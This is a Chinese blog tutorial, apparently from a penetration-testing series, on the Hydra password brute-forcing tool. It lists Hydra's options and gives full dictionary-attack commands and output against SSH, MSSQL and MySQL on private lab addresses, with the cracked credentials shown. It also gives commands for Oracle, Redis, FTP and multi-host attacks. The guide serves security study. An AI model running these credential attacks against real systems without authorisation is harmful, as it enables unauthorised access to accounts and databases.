暴力破解工具hydra

看着博客敲代码

已于 2022-08-05 16:33:40 修改

阅读量764

点赞数

分类专栏：渗透测试文章标签：渗透测试

于 2021-11-26 14:30:58 首次发布

本文链接：https://blog.csdn.net/qq_46023525/article/details/121558392

版权

渗透测试专栏收录该内容

13 篇文章 0 订阅

订阅专栏

暴力破解工具hydra

文章仅供学习。用于其他用途而产生不良后果,作者不承担任何法律责任!

官方网站
https://www.thc.org/
使用参数
hydra [[[-l LOGIN|-L FILE] [-p PASS|-PFILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]][-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户，对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写，指定密码破解，少用，一般是采用密码字典。
-P FILE 大写，指定密码字典。
-e ns 可选选项，n：空密码试探，s：使用指定用户和密码试探。
-C FILE 使用冒号分割格式，例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后，找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数，默认为16。
-w TIME 设置最大超时的时间，单位秒，默认是30s。
-v / -V 显示详细过程。

导入字典

┌──(root💀kali)-[~/桌面]
└─# ls
pass.txt  user.txt   #user为账号字典   pass为密码字典

ssh示例

┌──(root💀kali)-[~/桌面]
└─# hydra -L user.txt -P pass.txt ssh://10.238.91.126 -v   
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-26 11:19:54
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[VERBOSE] More tasks defined than login/pass pairs exist. Tasks reduced to 7
[DATA] max 7 tasks per 1 server, overall 7 tasks, 7 login tries (l:1/p:7), ~1 try per task
[DATA] attacking ssh://10.238.91.126:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://root@10.238.91.126:22
[INFO] Successful, password authentication is supported by ssh://10.238.91.126:22
[22][ssh] host: 10.238.91.126   login: root   password: 111111 
[STATUS] attack finished for 10.238.91.126 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-26 11:19:58

密码已经在开头为端口号的行显示出来了
[22][ssh] host: 10.238.91.126 login: root password: 111111

mssql示例

┌──(root💀kali)-[~/桌面]
└─# hydra -L user.txt -P pass.txt mssql://10.238.91.132 -v -t 10
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-26 11:25:26
[DATA] max 10 tasks per 1 server, overall 10 tasks, 42 login tries (l:6/p:7), ~5 tries per task
[DATA] attacking mssql://10.238.91.132:1433/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[1433][mssql] host: 10.238.91.132   login: sa   password: 123456
[STATUS] attack finished for 10.238.91.132 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-26 11:25:30

[1433][mssql] host: 10.238.91.132 login: sa password: 123456

MySQL示例

┌──(root💀kali)-[~/桌面]
└─# hydra -L user.txt -P pass.txt mysql://10.238.91.132 -v -t 10
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-26 11:26:36
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 42 login tries (l:6/p:7), ~11 tries per task
[DATA] attacking mysql://10.238.91.132:3306/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[3306][mysql] host: 10.238.91.132   login: root   password: I8k!R3p(#e
[STATUS] attack finished for 10.238.91.132 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-26 11:26:40

[3306][mysql] host: 10.238.91.132 login: root password: I8k!R3p(#e

以下服务没有本地环境因此没有具体示例。命令如下

oracle

hydra -P pass.txt oracle://192.168.0.129 -f –v

redis

hydra -P pass.txt -e nsr -t 16 192.168.0.101 redis

ftp

hydra -L user.txt -P pass.txt ftp://192.168.1.0 -f -V

多个ip进行穷举

增加 -M 跟ip列表，以MySQL为例。

hydra -L user.txt -P pass.txt -M ip.txt -V -o /root/crack mysql -t 16

看着博客敲代码

关注

0
点赞
踩
2

收藏

觉得还不错? 一键收藏
打赏
0
评论
暴力破解工具hydra

暴力破解工具hydra文章仅供学习。用于其他用途而产生不良后果,作者不承担任何法律责任!官方网站https://www.thc.org/使用参数hydra [[[-l LOGIN|-L FILE] [-p PASS|-PFILE]] | [-C FILE]] [-e ns][-o FILE] [-t TASKS] [-M FILE [-T TASKS]][-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]-R 继续从上一次进度接着破解
复制链接

扫一扫